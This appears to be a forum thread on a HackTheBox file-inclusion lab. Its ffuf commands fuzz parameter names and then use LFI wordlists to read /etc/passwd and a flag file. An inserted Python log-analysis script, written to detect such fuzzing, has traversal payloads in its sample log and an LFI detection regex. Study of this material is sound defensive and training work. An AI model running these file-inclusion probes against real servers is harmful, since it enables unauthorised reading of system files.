File Inclusion/Automated Scanning[questions]

| grep -v 2309
I was looking for "| grep -v 2309" on Google… and found this in your comment on the forum… good work man… thanks


Actually, the solution is very simple. If you know how to use the ffuf tool, the solution will take 3 minutes.

First, we use the “burp-parameter-names.txt” payloads to find the parameter. We filter by result size with “-fs”.

ffuf -w burp-parameter-names.txt:FUZZ -u "" -fs 2309

-fs size may differ.

XXXX = the 1 parameter you found.

After finding XXXX, try the “LFI-Jhaddix.txt” payloads to read the /etc/passwd file.

ffuf -w LFI-Jhaddix.txt:FUZZ -u "" -fs 1935 

You will be successful when you do the filtering process with ffuf.


First step:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://IP:PORT/index.php?FUZZ=value' -fs 2287
To find the size:
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://IP:PORT/index.php?FUZZ=value' -fs "size found"
and then
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://IP:PORT/index.php?FUZZ=value' -fs "size found"
you will see FUZZ = xxxx (4 characters)
and then
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u '' -fs "size found"
You will find
replace etc/passwd with flag.txt
you will see the flag HTB{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
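The two ffuf phases described in this thread (a wordlist of parameter names against one path, then a wordlist of traversal payloads against the parameter that was found) leave a very recognisable trail in a web server's access log. The script below is an added example for the defender side, not code from the thread, from HTB or from ffuf: it parses combined-format log lines, flags clients that probe many distinct parameter names against the same path, and flags any request whose query string carries a traversal sequence, a sensitive absolute path or a PHP stream wrapper after full URL-decoding. The log lines, IP addresses, response sizes and the 5-name threshold are constructed assumptions.

```python
"""Spot parameter-name fuzzing and LFI payload fuzzing in access logs."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access log (combined format); sizes mirror the thread's
# baseline/filtered values but the traffic itself is made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=value HTTP/1.1" 200 2287
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=value HTTP/1.1" 200 2287
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?user=value HTTP/1.1" 200 2287
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?view=value HTTP/1.1" 200 2287
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?file=value HTTP/1.1" 200 2287
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?view=../../../../etc/passwd HTTP/1.1" 200 1935
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?view=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 3410
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?view=about HTTP/1.1" 200 2287
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Traversal sequences, sensitive absolute paths and PHP wrappers that make up
# most of a typical LFI wordlist.
LFI_RE = re.compile(r'(\.\./|\.\.\\|/etc/passwd|/proc/self|php://)', re.IGNORECASE)


def parse_line(line):
    """Return a dict with ip, path, params, status, size; None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['size'] = 0 if rec['size'] == '-' else int(rec['size'])
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # keep_blank_values so a probe like "?file=" still yields a parameter name
    rec['params'] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding so %252e%252e%252f is seen as ../ too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lfi_attempts(lines):
    """(ip, path, param, decoded_value) for each request carrying an LFI payload."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec['params']:
            decoded = fully_decode(value)
            if LFI_RE.search(decoded):
                hits.append((rec['ip'], rec['path'], name, decoded))
    return hits


def find_param_fuzzing(lines, threshold=5):
    """{(ip, path): sorted parameter names} for clients that tried at least
    `threshold` distinct names against one path; a real wordlist run yields
    thousands, so the low threshold here is only for the constructed sample."""
    names = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, _ in rec['params']:
            names[(rec['ip'], rec['path'])].add(name)
    return {key: sorted(n) for key, n in names.items() if len(n) >= threshold}


def analyze(log_text):
    lines = log_text.splitlines()
    return {'fuzzing': find_param_fuzzing(lines), 'lfi': find_lfi_attempts(lines)}


if __name__ == '__main__':
    report = analyze(SAMPLE_LOG)
    for (ip, path), names in report['fuzzing'].items():
        print(f"parameter fuzzing from {ip} on {path}: {len(names)} names {names}")
    for ip, path, param, value in report['lfi']:
        print(f"LFI payload from {ip}: {path}?{param}={value}")
```

Sizes are useful here too, in the opposite direction from the thread: the scanning client's requests share one baseline size, while the one that answered with different content is the request a defender should look at first, so grouping `size` per client is an easy extension of `find_param_fuzzing`.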

with fuzzing I get v*** but I can't figure out this “You will find
…/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/etc/passwd” where I get a 700 response from ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u '' -fs "

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘’ -fs 1935

instead of etc/passwd, use flag.txt


Thanks for the explanation; it helped me understand how these skills assessments work.

Hey Luv2Hack, thank you for your help. It was very helpful, as I was drowning myself in unnecessary confusion. Just managed it! Cheers!

yes it’s all sweet, but…

i can’t understand why it doesn’t work!!!

The path of LFI-Jhaddix.txt (the wordlist) may not be the same.
Check the path of the file or wordlist.

I’m speechless. I spent more than 3 hours trying to get RCE to find the flag easily because I imagined that it was named with some kind of random numbers. It was in the root folder with the name “flag.txt”… Nice.